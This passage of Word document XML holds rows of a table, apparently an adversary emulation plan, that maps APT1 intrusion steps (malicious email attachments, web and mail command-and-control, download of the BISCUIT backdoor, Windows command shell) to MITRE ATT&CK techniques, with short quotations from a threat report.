            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="687C7E92" w14:textId="32447A2D" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B109437" w14:textId="523CA3DD" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:r>
              <w:t xml:space="preserve">[1] Some APT1 actors have gone to the trouble of making the malicious software inside their ZIP files look like benign Adobe PDF files. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="009F49DF" w14:paraId="443B5DD5" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F36ABA2" w14:textId="44A2CCFE" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F631488" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57178577" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C67FAD3" w14:textId="1301863F" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD901B0" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB004BC" w14:textId="1F20C2AD" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C0E4D43" w14:textId="437FDF8D" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42972549" w14:textId="536E142B" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009F49DF">
              <w:t>APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B0550B" w14:textId="6E261616" w:rsidR="00674213" w:rsidRDefault="002B7702" w:rsidP="00674213">
            <w:r>
              <w:t>[1] This file is actually a dropper for a custom APT1 backdoor that we call WEBC2-QBP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB6F0A9" w14:textId="3ACE7EC2" w:rsidR="00991637" w:rsidRPr="009F49DF" w:rsidRDefault="00991637" w:rsidP="00674213">
            <w:r>
              <w:t xml:space="preserve">The steps describing </w:t>
            </w:r>
            <w:r w:rsidR="002B7702">
              <w:t xml:space="preserve">exactly </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">how the malware is installed is not available. We will assume </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>that a [1] p32 WebC2 backdoor is installed and th</w:t>
            </w:r>
            <w:r w:rsidR="002B7702">
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> then downloads a standard backdoor as this is </w:t>
            </w:r>
            <w:r w:rsidR="00901920">
              <w:t xml:space="preserve">broadly </w:t>
            </w:r>
            <w:r>
              <w:t>referred to broadly in other reports around this time.</w:t>
            </w:r>
            <w:r w:rsidR="00901920">
              <w:t xml:space="preserve"> [6][7][8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="003E52D1" w14:paraId="09EE7D10" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35CBCCF9" w14:textId="71EF52F3" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6683301E" w14:textId="7FA52E55" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D9C990" w14:textId="7DB23DFC" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001 Application Layer Protocol: Web Protocols</w:t>
            </w:r>
            <w:r w:rsidRPr="003E52D1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B166AE9" w14:textId="349F006B" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B4F685" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2226099A" w14:textId="3C87ED90" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16103F12" w14:textId="2BD193F6" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08504187" w14:textId="52670AF7" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1] In almost every case, APT backdoors initiate outbound connections to the intruder’s “command and control” (C2) server</w:t>
            </w:r>
            <w:r w:rsidR="00E64EE0">
              <w:t>. HTTP messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC04D7" w:rsidRPr="00673453" w14:paraId="620F5EF8" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54AF077D" w14:textId="1557C345" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="008B6A20" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BF2F89" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="168F6E8B" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="179080D2" w14:textId="51D25E2E" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAAC638" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B830239" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF9212C" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRPr="00673453" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3610EF86" w14:textId="77777777" w:rsidR="00FC04D7" w:rsidRDefault="00FC04D7" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Download</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, install </w:t>
            </w:r>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>and execute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> BISCUIT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7A4E02" w14:textId="26451094" w:rsidR="00DB09F4" w:rsidRPr="00673453" w:rsidRDefault="00DB09F4" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>We do not have specific installation/persistence notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7702" w:rsidRPr="003E52D1" w14:paraId="64AF6458" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FBC243F" w14:textId="6785270C" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="008B6A20" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC742C7" w14:textId="77777777" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A59A77B" w14:textId="3D745513" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.00</w:t>
            </w:r>
            <w:r w:rsidR="00E64EE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: </w:t>
            </w:r>
            <w:r w:rsidR="00E64EE0" w:rsidRPr="00E64EE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Mail Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7AF5B2" w14:textId="10A634CB" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5430899A" w14:textId="77777777" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="651BADE9" w14:textId="77777777" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71EBC318" w14:textId="77777777" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F8010A" w14:textId="77777777" w:rsidR="002B7702" w:rsidRDefault="002B7702" w:rsidP="002B7702">
            <w:r>
              <w:t xml:space="preserve">[1] In almost every case, APT backdoors initiate outbound connections to the intruder’s “command and control” (C2) server [1] Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol. APT1 has created a </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA86ECB" w14:textId="75F31CCD" w:rsidR="002B7702" w:rsidRPr="003E52D1" w:rsidRDefault="002B7702" w:rsidP="002B7702">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>handful of these, including…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00F16C9D" w14:paraId="405CD57F" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0856F749" w14:textId="0F2E9A15" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B59502A" w14:textId="3FB3B154" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C6507E9" w14:textId="1BE9853C" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AED7FBD" w14:textId="72F1B6BD" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F2B246" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
